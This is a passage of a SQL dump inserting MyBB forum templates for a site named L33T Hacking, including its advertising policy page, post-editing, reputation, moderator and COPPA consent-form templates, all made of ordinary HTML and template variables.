SIZE=\"2\">{$mybb->settings[\'modsmco\']}</font></td> <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \"> <font SIZE=\"2\">{$mybb->settings[\'modsacp\']}</font></td> </tr> <tr> <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \"> <p style=\"margin-top: 0; margin-bottom: 0\"><font size=\"2\"><b>Forum Display:</b></font></p> <p style=\"margin-top: 0; margin-bottom: 0\"><font size=\"2\"><b>These plugins will modify your forum\'s forumdisplay.php page.</b></font></td> <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \"> <p style=\"margin-top: 0; margin-bottom: 0\"><font size=\"2\"><b>Index:</b></font></p> <p style=\"margin-top: 0; margin-bottom: 0\"><font size=\"2\"><b>These plugins will modify your forum\'s index.php page.</b></font></td> </tr> <tr> <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \"> <font SIZE=\"2\">{$mybb->settings[\'modsfdi\']}</font></td> <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \"> <font SIZE=\"2\">{$mybb->settings[\'modsind\']}</font></td> </tr> <tr> <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \"> <p style=\"margin-top: 0; margin-bottom: 0\"><font size=\"2\"><b>Show Thread:</b></font></p> <p style=\"margin-top: 0; margin-bottom: 0\"><font size=\"2\"><b>These plugins will modify your forum\'s showthread.php page.</b></font></td> <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \"> <p style=\"margin-top: 0; margin-bottom: 0\"><font size=\"2\"><b>Miscellaneous:</b></font></p> <p style=\"margin-top: 0; margin-bottom: 0\"><font size=\"2\"><b>These plugins will modify some miscellaneous features.</b></font></td> </tr> <tr> <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \"> <font SIZE=\"2\">{$mybb->settings[\'modssth\']}</font></td> <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \"> <font SIZE=\"2\">{$mybb->settings[\'modsmis\']}</font></td> </tr> <tr> <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \"> <p style=\"margin-top: 0; margin-bottom: 0\"><font size=\"2\"><b>New Pages:</b></font></p> <p style=\"margin-top: 0; margin-bottom: 0\"><font size=\"2\"><b>These plugins will add some brand new pages.</b></font></td> <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \"> <p style=\"margin-top: 0; margin-bottom: 0\"><font size=\"2\"><b>User Profiles:</b></font></p> <p style=\"margin-top: 0; margin-bottom: 0\"><font size=\"2\"><b>These plugins will modify your forum\'s member.php page.</b></font></td> </tr> <tr> <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \"> <font SIZE=\"2\">{$mybb->settings[\'modsnpg\']}</font></td> <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \"> <font SIZE=\"2\">{$mybb->settings[\'modsupr\']}</font></td> </tr> <tr> <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \"> <p style=\"margin-top: 0; margin-bottom: 0\"><font size=\"2\"><b>Postings Plugins:</b></font></p> <p style=\"margin-top: 0; margin-bottom: 0\"><font size=\"2\"><b>These plugins will enhance your forum\'s postings area.</b></font></td> <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \"> <p style=\"margin-top: 0; margin-bottom: 0\"><font size=\"2\"><b>MYPS Extensions:</b></font></p> <p style=\"margin-top: 0; margin-bottom: 0\"><font size=\"2\"><b>Enhance some great features of MYPS with these plugins.</b></font></td> </tr> <tr> <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \"> <font SIZE=\"2\">{$mybb->settings[\'modspos\']}</font></td> <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \"> <font SIZE=\"2\">{$mybb->settings[\'modsmyps\']}</font></td> </tr> </table> <p style=\"margin-top: 0; margin-bottom: 0\" align=\"right\"><b> <font size=\"1\" color=\"#0000FF\">Powered by </font><font size=\"1\"> <a href=\"http://www.mybbcodes.com/\">MyBB Codes</a><font face=\"Times New Roman\" color=\"#0000FF\">', '-1', '0', '', '0'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2014', 'global_adspg', '<html> <head> <title>Advertising on L33THacking</title> {$headerinclude} </head> <body> {$header} <table border=\"0\" cellspacing=\"1\" cellpadding=\"4\" class=\"tborder\"> <tr> <td class=\"thead\"><span class=\"smalltext\"><strong>Advertising on L33T Hacking</strong></span></td> </tr> <tr> <td class=\"trow1\"> Looking forward to advertise with L33T Hacking? Find answers to most of your questions below. <br /> <br /> <div style=\"color: #00AB09;font-weight: bold;\">Header Advertisement</div> Our header ad spot is permanently reserved by our ad network, so we don\'t allow Header Advertisements at all. <br /> <br /> <div style=\"color: #00AB09;font-weight: bold;\">Footer Advertisements</div> We do have Footer Advertisements, we currently provide 6 footer advertisements. Each footer image(s) is required to be 88x31 in size. <br /> <br /> <div style=\"color: #00AB09;font-weight: bold;\">Inline ads</div> We allow inline ads for all users exempt Staff in CLOSED threads only. When a thread is closed, then automatically ads will appear in those threads. <br /> <br /> <div style=\"color: #00AB09;font-weight: bold;\">Sticky Threads</div> LH offers a pay for sticky advertisement system which proves to be very successful for those who purchase stickies. The maximum paid for stickies in each section is 5 and if one section is full you can reserve your spot by PMing <a href=\"http://l33thacking.com/member.php?action=profile&uid=1\"><span style=\"color: yellow;font-weight: bold;\">T3h Jok3r</span></a>. Our sticky purchase policy is that you can\'t buy a sticky for less than a week. <br /> <br /> <div style=\"color: #00AB09;font-weight: bold;\"><u>FAQs</u></div> <br /> <div style=\"color: #00AB09;font-weight: bold;\">Can I advertise a competing website?</div> No, you may not. <br /> <br /> <div style=\"color: #00AB09;font-weight: bold;\">What payment methods does L33T Hacking accept?</div> We only accept PayPal and haven\'t yet thought of Liberty Reserve. <br /> <br /> <div style=\"color: #00AB09;font-weight: bold;\">Can I buy a sticky in any section?</div> Yes, you may purchase a sticky in any visible forum but once again no competing sites also if you are buying a sticky, the price varies on duration of sticky purchase. <br /> <br /> <div style=\"color: red;font-weight: bold;\">If you wish to purchase a stick in a section that wasn\'t mentioned then contact us via our <a hef=\"http://l33thacking.com/contact.php\">contact form</a> or by sending <a href=\"http://l33thacking.com/member.php?action=profile&uid=1\"><span style=\"color: yellow;font-weight: bold;\">T3h Jok3r</span></a> a Private Message.</div> </td></tr></table> {$footer} </body> </html>', '8', '1608', '', '1345642230'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2018', 'report_exists', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->report_post}asdasd</title> {$headerinclude} </head> <body> <br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"trow1\" align=\"center\"> <br /> <br /> <strong>{$lang->report_error}</strong> <blockquote>{$lang->report_exists}</blockquote> <br /><br /> <div> <script type=\"text/javascript\"> <!-- document.write(\'[<a href=\"javascript:history.go(-1);\">{$lang->go_back}</a>]\'); document.write(\'[<a href=\"javascript:window.close();\">{$lang->close_window}</a>]\'); // --> </script> </div> </td> </tr> </table> </body> </html>', '-1', '1.0', '', '1345681553'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2022', 'editpost_editedby', '<td class=\"trow2\"><strong>{$lang->edited_by}</strong></td> <td class=\"trow2\"><span class=\"smalltext\"> <label><input type=\"checkbox\" class=\"checkbox\" name=\"disableeditedby\" value=\"1\" tabindex=\"7\" {$disableeditedby} /> {$lang->disable_edited_by}</label></span> </td> </tr>', '-1', '', '', '1345767270'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2023', 'editpost', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->edit_post}</title> {$headerinclude} <script type=\"text/javascript\" src=\"jscripts/post.js?ver=1400\"></script> </head> <body> {$header} {$preview} {$post_errors} {$attacherror} <form action=\"editpost.php\" method=\"post\" name=\"editpost\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"3\"><strong>{$lang->delete_post}</strong></td> </tr> <tr> <td class=\"trow1\" style=\"white-space: nowrap\"><input type=\"checkbox\" class=\"checkbox\" name=\"delete\" value=\"1\" tabindex=\"9\" /> <strong>{$lang->delete_q}</strong></td> <td class=\"trow1\" width=\"100%\">{$lang->delete_1}<br /><span class=\"smalltext\">{$lang->delete_2}</span></td> <td class=\"trow1\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->delete_now}\" tabindex=\"10\" /></td> </tr> </table> <input type=\"hidden\" name=\"action\" value=\"deletepost\" /> <input type=\"hidden\" name=\"pid\" value=\"{$pid}\" /> </form> <br /> <form action=\"editpost.php?pid={$pid}&amp;processed=1\" method=\"post\" enctype=\"multipart/form-data\" name=\"input\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->edit_post}</strong></td> </tr> {$loginbox} <tr> <td class=\"trow2\"><strong>{$lang->subject}</strong></td> <td class=\"trow2\">{$prefixselect}<input type=\"text\" class=\"textbox\" name=\"subject\" size=\"40\" maxlength=\"85\" value=\"{$subject}\" tabindex=\"1\" /></td> </tr> {$posticons} <tr> <td class=\"trow2\" valign=\"top\"><strong>{$lang->your_message}:</strong><br /><div style=\"text-align: center;\">{$smilieinserter}</div></td> <td class=\"trow2\"> <textarea name=\"message\" id=\"message\" rows=\"20\" cols=\"70\" tabindex=\"3\">{$message}</textarea> {$codebuttons} </td> </tr> <tr> <td class=\"trow1\" valign=\"top\"><strong>{$lang->post_options}</strong></td> <td class=\"trow1\"><span class=\"smalltext\"> <label><input type=\"checkbox\" class=\"checkbox\" name=\"postoptions[signature]\" value=\"1\" tabindex=\"6\"{$postoptionschecked[\'signature\']} /> {$lang->options_sig}</label> {$disablesmilies}</span> </td> </tr> {$subscriptionmethod} {$pollbox}{$editedby} </table> {$attachbox} <br /> <div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->update_post}\" tabindex=\"3\" accesskey=\"s\" /> <input type=\"submit\" class=\"button\" name=\"previewpost\" value=\"{$lang->preview_post}\" tabindex=\"4\" /></div> <input type=\"hidden\" name=\"action\" value=\"do_editpost\" /> <input type=\"hidden\" name=\"posthash\" value=\"{$posthash}\" /> <input type=\"hidden\" name=\"attachmentaid\" value=\"\" /> <input type=\"hidden\" name=\"attachmentact\" value=\"\" /> </form> {$footer} </body> </html>', '1', '1608', '', '1345767270'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2025', 'editpost', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->edit_post}</title> {$headerinclude} <script type=\"text/javascript\" src=\"jscripts/post.js?ver=1400\"></script> </head> <body> {$header} {$preview} {$post_errors} {$attacherror} <form action=\"editpost.php\" method=\"post\" name=\"editpost\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"3\"><strong>{$lang->delete_post}</strong></td> </tr> <tr> <td class=\"trow1\" style=\"white-space: nowrap\"><input type=\"checkbox\" class=\"checkbox\" name=\"delete\" value=\"1\" tabindex=\"9\" /> <strong>{$lang->delete_q}</strong></td> <td class=\"trow1\" width=\"100%\">{$lang->delete_1}<br /><span class=\"smalltext\">{$lang->delete_2}</span></td> <td class=\"trow1\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->delete_now}\" tabindex=\"10\" /></td> </tr> </table> <input type=\"hidden\" name=\"action\" value=\"deletepost\" /> <input type=\"hidden\" name=\"pid\" value=\"{$pid}\" /> </form> <br /> <form action=\"editpost.php?pid={$pid}&amp;processed=1\" method=\"post\" enctype=\"multipart/form-data\" name=\"input\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->edit_post}</strong></td> </tr> {$loginbox} <tr> <td class=\"trow2\"><strong>{$lang->subject}</strong></td> <td class=\"trow2\">{$prefixselect}<input type=\"text\" class=\"textbox\" name=\"subject\" size=\"40\" maxlength=\"85\" value=\"{$subject}\" tabindex=\"1\" /></td> </tr> {$posticons} <tr> <td class=\"trow2\" valign=\"top\"><strong>{$lang->your_message}:</strong><br /><div style=\"text-align: center;\">{$smilieinserter}</div></td> <td class=\"trow2\"> <textarea name=\"message\" id=\"message\" rows=\"20\" cols=\"70\" tabindex=\"3\">{$message}</textarea> {$codebuttons} </td> </tr> <tr> <td class=\"trow1\" valign=\"top\"><strong>{$lang->post_options}</strong></td> <td class=\"trow1\"><span class=\"smalltext\"> <label><input type=\"checkbox\" class=\"checkbox\" name=\"postoptions[signature]\" value=\"1\" tabindex=\"6\"{$postoptionschecked[\'signature\']} /> {$lang->options_sig}</label> {$disablesmilies}</span> </td> </tr> {$subscriptionmethod} {$pollbox}{$editedby} </table> {$attachbox} <br /> <div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->update_post}\" tabindex=\"3\" accesskey=\"s\" /> <input type=\"submit\" class=\"button\" name=\"previewpost\" value=\"{$lang->preview_post}\" tabindex=\"4\" /></div> <input type=\"hidden\" name=\"action\" value=\"do_editpost\" /> <input type=\"hidden\" name=\"posthash\" value=\"{$posthash}\" /> <input type=\"hidden\" name=\"attachmentaid\" value=\"\" /> <input type=\"hidden\" name=\"attachmentact\" value=\"\" /> </form> {$footer} </body> </html>', '8', '1608', '', '1345767270'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2028', 'reputation_add', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->reputation}</title> {$headerinclude} </head> <body> <br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"trow1\" style=\"padding: 20px\"> <strong>{$vote_title}</strong><br />{$post_rep_info}<br /> <form action=\"reputation.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"hidden\" name=\"action\" value=\"do_add\" /> <input type=\"hidden\" name=\"uid\" value=\"{$user[\'uid\']}\" /> <input type=\"hidden\" name=\"pid\" value=\"{$mybb->input[\'pid\']}\" /> <input type=\"hidden\" name=\"rid\" value=\"{$rid}\" /> <select name=\"reputation\" id=\"reputation\"> {$positive_power} {$neutral_power} {$negative_power} </select> <br /><br /> <span class=\"smalltext\">{$lang->user_comments}</span> <br /> <input type=\"text\" class=\"textbox\" name=\"comments\" size=\"35\" maxlength=\"250\" value=\"{$comments}\" style=\"width: 95%\" /> <br /><br /> <div style=\"text-align: center;\"> <input type=\"submit\" class=\"button\" value=\"{$vote_button}\" /> {$delete_button} </div> </form> {$repfuckbutton} </div> </td> </tr> </table> </body> </html>', '8', '1608', '', '1346117746'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2034', 'member_profile_modoptions', ' <br /><table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\" class=\"tborder\"> <tr> <td colspan=\"2\" class=\"thead\"><strong>{$lang->mod_options}</strong></td> </tr> <tr> <td class=\"trow1\"> <ul> <li><a href=\"{$mybb->settings[\'bburl\']}/modcp.php?action=editprofile&amp;uid={$uid}\">{$lang->edit_in_mcp}</a></li> <li><a href=\"{$mybb->settings[\'bburl\']}/modcp.php?action=banuser&amp;uid={$uid}\">{$lang->ban_in_mcp}</a></li> </ul> </td> </tr> <tr> <td class=\"trow2\"> {$memprofile[\'usernotes\']}<br /> <a href=\"{$mybb->settings[\'bburl\']}/modcp.php?action=editprofile&amp;uid={$uid}\">{$lang->edit_usernotes}</a> </td> </tr> {goodbyespammer}</table> ', '8', '1608', '', '1346459787'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2041', 'usercp_nav_misc', '<tr> <td class=\"tcat\"> <div class=\"expcolimage\"><img src=\"{$theme[\'imgdir\']}/collapse{$collapsedimg[\'usercpmisc\']}.gif\" id=\"usercpmisc_img\" class=\"expander\" alt=\"[-]\" title=\"[-]\" /></div> <div><span class=\"smalltext\"><strong>{$lang->ucp_nav_misc}</strong></span></div> </td> </tr> <tbody style=\"{$collapsed[\'usercpmisc_e\']}\" id=\"usercpmisc_e\"> <tr><td class=\"trow1 smalltext\"><a href=\"usercp.php?action=usergroups\" class=\"usercp_nav_item usercp_nav_usergroups\">{$lang->ucp_nav_usergroups}</a></td></tr> <tr><td class=\"trow1 smalltext\"><a href=\"usercp.php?action=editlists\" class=\"usercp_nav_item usercp_nav_editlists\">{$lang->ucp_nav_editlists}</a></td></tr> <tr><td class=\"trow1 smalltext\"><a href=\"usercp.php?action=attachments\" class=\"usercp_nav_item usercp_nav_attachments\">{$lang->ucp_nav_attachments}</a></td></tr> <tr><td class=\"trow1 smalltext\">{$draftstart}<a href=\"usercp.php?action=drafts\" class=\"usercp_nav_item usercp_nav_drafts\">{$lang->ucp_nav_drafts} {$draftcount}</a>{$draftend}</td></tr> <tr><td class=\"trow1 smalltext\"><a href=\"usercp.php?action=subscriptions\" class=\"usercp_nav_item usercp_nav_subscriptions\">{$lang->ucp_nav_subscribed_threads}</a></td></tr> <tr><td class=\"trow1 smalltext\"><a href=\"usercp.php?action=forumsubscriptions\" class=\"usercp_nav_item usercp_nav_fsubscriptions\">{$lang->ucp_nav_forum_subscriptions}</a></td></tr> <tr><td class=\"trow1 smalltext\"><a href=\"{$profile_link}\" class=\"usercp_nav_item usercp_nav_viewprofile\">{$lang->ucp_nav_view_profile}</a></td></tr> <tr><td class=\"trow1 smalltext\"><a href=\"refer.php?action=invite\">Refer A Member</a></td></tbody>', '8', '1608', '', '1346459916'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2042', 'online_today_index', '<tr> <td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->whos_online_today}</strong> [<a href=\"online.php?action=today\">{$lang->complete_list}</a>]</span></td> </tr> <tr> <td class=\"trow1\"><span class=\"smalltext\">{$lang->online_note_today}<br />{$onlinemembers}</span></td> </tr>', '-1', '0', '', '0'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2043', 'index_boardstats', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <thead> <tr> <td class=\"thead\"> <div class=\"expcolimage\"><img src=\"{$theme[\'imgdir\']}/collapse{$collapsedimg[\'boardstats\']}.gif\" id=\"boardstats_img\" class=\"expander\" alt=\"[-]\" title=\"[-]\" /></div> <div><strong>{$lang->boardstats}</strong></div> </td> </tr> </thead> <tbody style=\"{$collapsed[\'boardstats_e\']}\" id=\"boardstats_e\"> {$whosonline} {$online_today} {$birthdays} {$forumstats} <tr> <td class=\"tfoot\" style=\"text-align: right\"> <span class=\"smalltext\"> {$logoutlink} <a href=\"misc.php?action=markread{$post_code_string}\">{$lang->markread}</a> | <a href=\"showteam.php\">{$lang->forumteam}</a> | <a href=\"stats.php\">{$lang->forumstats}</a> </span> </td> </tr> </tbody> </table> <br />', '1', '1608', '', '1346646704'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2045', 'index_boardstats', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <thead> <tr> <td class=\"thead\"> <div class=\"expcolimage\"><img src=\"{$theme[\'imgdir\']}/collapse{$collapsedimg[\'boardstats\']}.gif\" id=\"boardstats_img\" class=\"expander\" alt=\"[-]\" title=\"[-]\" /></div> <div><strong>{$lang->boardstats}</strong></div> </td> </tr> </thead> <tbody style=\"{$collapsed[\'boardstats_e\']}\" id=\"boardstats_e\"> {$whosonline} {$online_today} {$birthdays} {$forumstats} <tr> <td class=\"tfoot\" style=\"text-align: right\"> <span class=\"smalltext\"> {$logoutlink} <a href=\"misc.php?action=markread{$post_code_string}\">{$lang->markread}</a> | <a href=\"showteam.php\">{$lang->forumteam}</a> | <a href=\"stats.php\">{$lang->forumstats}</a> </span> </td> </tr> </tbody> </table> <br />', '8', '1608', '', '1346646704'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2047', 'forumdisplay', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$foruminfo[\'name\']} {$google_seo_page} </title> {$headerinclude} {$rssdiscovery} <script type=\"text/javascript\"> <!-- lang.no_new_posts = \"{$lang->no_new_posts}\"; lang.click_mark_read = \"{$lang->click_mark_read}\"; // --> </script> </head> <body> {$header} {$moderatedby} {$usersbrowsing} {$rules} {$subforums} {$threadslist} {$footer} </body> </html>', '8', '1608', '', '1347136646'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2049', 'member_coppa_form', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->coppa_compliance}</title> <style type=\"text/css\"> body { font-family: Verdana, Arial, sans-serif; font-size: 13px; } .largetext, h1 { font-family: Verdana, Arial, sans-serif; font-size: medium; font-weight: bold; margin: 0; } .grey { color: #ccc; } dl { margin-left: 40px; } dt { width: 150px; float: left; clear: left; font-weight: bold; } dd { margin-bottom: 20px; margin-left: 150px; } dd.single { margin-left: 0; } input.textbox { border: 0; border-bottom: 1px solid #000; font-size: 16px; width: 350px; } input.date { width: 80px; } </style> </head> <body> <div style=\"float: right; text-align: center; padding-bottom: 10px;\" class=\"largetext\"> {$mybb->settings[\'bbname\']}<br /><span class=\"grey\">{$lang->coppa_registration}</span> </div> <div style=\"padding-bottom: 10px;\"><a href=\"index.php\"><img src=\"{$theme[\'logo\']}\" alt=\"{$mybb->settings[\'bbname\']}\" border=\"0\" /></a></div> <hr size=\"1\" style=\"clear: both;\" /> <p>Please have this agreement emailed to support@l33thacking.net with the title \"Coppa\". Thank you!</p> <dl> <dt>{$lang->mailing_address}</dt> <dd>{$mybb->settings[\'mailingaddress\']}</dd> </dl> <h1 style=\"clear: both;\" />{$lang->account_information}</h1> <dl> <dt><label for=\"username\">{$lang->username}</label></dt> <dd><input type=\"text\" class=\"textbox\" id=\"username\" /></dd> <dt><label for=\"email\">{$lang->email}</label></dt> <dd><input type=\"text\" class=\"textbox\" id=\"email\" /></dd> <dt><label for=\"username\">Desired Password:</label></dt> <dd><input type=\"text\" class=\"textbox\" id=\"password\" /></dd> </dl> <h1 style=\"clear: both;\" />{$lang->parent_details}</h1> <dl> <dt><label for=\"name\">{$lang->full_name}</label></dt> <dd><input type=\"text\" class=\"textbox\" id=\"name\" /></dd> <dt><label for=\"relation\">{$lang->relation}</label></dt> <dd><input type=\"text\" class=\"textbox\" id=\"relation\" /></dd> <dt><label for=\"phone\">{$lang->phone_no}</label></dt> <dd><input type=\"text\" class=\"textbox\" id=\"phone\" /></dd> <dt><label for=\"parent_email\">{$lang->email}</label></dt> <dd><input type=\"text\" class=\"textbox\" id=\"parent_email\" /></dd> <dd class=\"single\">{$lang->coppa_parent_agreement} Feel free to have a look at our legal policies/disclaimer <a href=\"http://l33thacking.net/misc.php?action=help&hid=16\">HERE</a></dd> <dt><label for=\"signature\">{$lang->signature}</label></dt> <dd><input type=\"text\" class=\"textbox\" id=\"signature\" /> Date: <input type=\"text\" class=\"textbox date\" id=\"date\" /></dd> </dl> </body> </html>', '8', '1608', '', '1347176017'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2050', 'reputation_edit', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->reputation}</title> {$headerinclude} </head> <body> <br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"trow1\" style=\"padding: 20px\"> <strong>{$lang->edit_comment}</strong><br /> <form action=\"reputation.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"hidden\" name=\"action\" value=\"do_edit\" /> <input type=\"hidden\" name=\"uid\" value=\"{$mybb->input[\'uid\']}\" /> <input type=\"hidden\" name=\"rid\" value=\"{$mybb->input[\'rid\']}\" /> <br /><br /> <span class=\"smalltext\">{$lang->update_this_comment}</span> <br /> <input type=\"text\" class=\"textbox\" name=\"comments\" size=\"35\" maxlength=\"350\" value=\"{$editrep[\'comments\']}\" style=\"width: 95%\" /> <br /><br /> <div style=\"text-align: center;\"> <input type=\"submit\" class=\"button\" value=\"{$lang->update_comment}\" /> </div> </form> </td> </tr> </table> </body> </html>', '-1', '', '', '1350352468'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2051', 'reputation_edit_error', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->reputation}</title> {$headerinclude} </head> <body> <br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"trow1\" style=\"padding: 20px\"> <strong>{$lang->error}</strong><br /><br /> <blockquote>{$message}</blockquote> <br /><br /> <div style=\"text-align: center;\"> <script type=\"text/javascript\"> <!-- var showBack = {$show_back}; if(showBack == 1) { document.write(\'[<a href=\"javascript:history.go(-1);\">{$lang->go_back}</a>]\'); } document.write(\'[<a href=\"javascript:window.close();\">{$lang->close_window}</a>]\'); // --> </script> </div> </td> </tr> </table> </body> </html>', '-1', '', '', '1350352468'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2052', 'reputation_vote', '<tr> <td class=\"trow1 {$status_class}\"> {$reputation_vote[\'username\']} <span class=\"smalltext\">{$reputation_vote[\'user_reputation\']} - {$last_updated} <!-- editlink{$reputation_vote[\'rid\']} --> {$delete_link}<br />{$postrep_given}<br /></span> <strong class=\"{$vote_type_class}\">{$vote_type} {$vote_reputation}:</strong> {$reputation_vote[\'comments\']} </td> </tr>', '1', '1608', '', '1350352468'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2080', 'achivements_modcp_quit', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->quitachivement}</title> {$headerinclude} </head> <body> {$header} <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$modcp_nav} <td valign=\"top\"> <form action=\"modcp.php?action=achivements\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"hidden\" name=\"mod\" value=\"{$mybb->input[\'mod\']}\" /> <input type=\"hidden\" name=\"acid\" value=\"{$mybb->input[\'acid\']}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->quitcustom}</strong></td> </tr> <tr> <td class=\"trow1\"><strong>{$lang->user}</strong>:</td> <td class=\"trow2\"><input type=\"text\" class=\"textbox\" id=\"username\" name=\"username\" size=\"40\" maxlength=\"85\" tabindex=\"1\" /></td> </table> <br /> <div style=\"text-align:center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->quitachivement}\"/></div> </form> </td> </tr> </table> {$footer} <script type=\"text/javascript\" src=\"jscripts/autocomplete.js?ver=1400\"></script> <script type=\"text/javascript\"> <!-- if(use_xmlhttprequest == \"1\") { new autoComplete(\"username\", \"xmlhttp.php?action=get_users\", {valueSpan: \"username\"}); } // --> </script> </body> </html>', '-1', '1604', '', '1350790438'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2081', 'achivements_modcp_nav', '<tr> <td class=\"trow1 smalltext\"> <a href=\"modcp.php?action=achivements\" style=\"display: block;padding: 1px 0 1px 23px;background: url(inc/plugins/achivements/include/images/modcp.png) no-repeat left center;\">{$lang->custom_modules}</a></td> </tr>', '-1', '1604', '', '1350790438'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2082', 'achivements_modcp_list', '<tr> <td class=\"{$trow}\" align=\"center\"><img src=\"{$custom[\'image\']}\" title=\"{$custom[\'name\']}\" /></td> <td class=\"{$trow}\"><strong>{$custom[\'name\']}</strong><br /><span class=\"smalltext\">{$custom[\'reason\']}</span></td> <td class=\"{$trow}\" width=\"10%\" align=\"center\"><a 